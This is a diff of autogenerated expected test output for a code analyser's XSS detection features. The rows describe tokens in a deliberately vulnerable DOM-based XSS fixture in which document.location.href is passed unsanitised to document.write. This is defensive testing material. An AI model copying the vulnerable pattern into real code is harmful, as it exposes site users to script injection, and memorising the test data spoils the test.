    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:60:8:68 | substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:60:8:68 | substring | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:77 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:77 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:77 | document | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:77 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:77 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:86 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:86 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:86 | document.location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:86 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:86 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:91 | documen ... on.href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:91 | documen ... on.href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:91 | documen ... on.href | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:91 | documen ... on.href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:91 | documen ... on.href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | documen ... ault=") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | documen ... ault=") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | documen ... ault=") | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | documen ... ault=") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | documen ... ault=") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | documen ... ault=") | stringConcatenatedWith | -endpoint- ? | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | exceptional return of documen ... ault=") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | exceptional return of documen ... ault=") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | exceptional return of documen ... ault=") | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | exceptional return of documen ... ault=") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:70:8:111 | exceptional return of documen ... ault=") | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:8:70:8:113 | documen ... lt=")+8 | CalleeFlexibleAccessPath | document.location.href.substring | | autogenerated/Xss/DomBasedXss/tst.js:8:70:8:113 | documen ... lt=")+8 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:8:70:8:113 | documen ... lt=")+8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15919,6 +111798,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:8:70:8:113 | documen ... lt=")+8 | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:8:70:8:113 | documen ... lt=")+8 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:8:70:8:113 | documen ... lt=")+8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:79:8:86 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:79:8:86 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:79:8:86 | location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:79:8:86 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:79:8:86 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:88:8:91 | href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:88:8:91 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:88:8:91 | href | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:88:8:91 | href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:88:8:91 | href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:93:8:99 | indexOf | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:93:8:99 | indexOf | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:93:8:99 | indexOf | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:93:8:99 | indexOf | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:93:8:99 | indexOf | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:8:101:8:110 | "default=" | CalleeFlexibleAccessPath | document.location.href.indexOf | | autogenerated/Xss/DomBasedXss/tst.js:8:101:8:110 | "default=" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:8:101:8:110 | "default=" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15926,12 +111820,43 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:8:101:8:110 | "default=" | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:8:101:8:110 | "default=" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:8:101:8:110 | "default=" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:113:8:113 | 8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:8:113:8:113 | 8 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:8:113:8:113 | 8 | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:8:113:8:113 | 8 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:8:113:8:113 | 8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:8:113:8:113 | 8 | stringConcatenatedWith | document.location.href.indexOf() -endpoint- | | autogenerated/Xss/DomBasedXss/tst.js:8:116:8:126 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:8:116:8:126 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:8:116:8:126 | "" | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:8:116:8:126 | "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:8:116:8:126 | "" | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:8:116:8:126 | "" | stringConcatenatedWith | ' document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:10 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:16 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:16 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:16 | document.write | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:16 | document.write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:16 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | documen ... TION>") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | documen ... TION>") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | documen ... TION>") | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | documen ... TION>") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | documen ... TION>") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | exceptional return of documen ... TION>") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | exceptional return of documen ... TION>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | exceptional return of documen ... TION>") | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | exceptional return of documen ... TION>") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:9:3:9:52 | exceptional return of documen ... TION>") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:9:12:9:16 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:9:12:9:16 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:9:12:9:16 | write | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:9:12:9:16 | write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:9:12:9:16 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:9:18:9:51 | "" | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:9:18:9:51 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:9:18:9:51 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -15940,12 +111865,32 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:9:18:9:51 | "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:9:18:9:51 | "" | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:9:18:9:51 | "" | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:3 | $ | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | $('
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | $('
    ') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | $('
    ') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | $('
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | $('
    ') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | exceptional return of $('
    ') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | exceptional return of $('
    ') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | exceptional return of $('
    ') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | exceptional return of $('
    ') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:12:3:12:43 | exceptional return of $('
    ') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:12:5:12:24 | '
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:12:5:12:24 | '
    ' | +| autogenerated/Xss/DomBasedXss/tst.js:12:5:12:33 | '
    document location href substring document location href indexOf default= 8 document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:12:5:12:33 | '
    ' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:12:5:12:42 | '
    ' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:12:5:12:42 | '
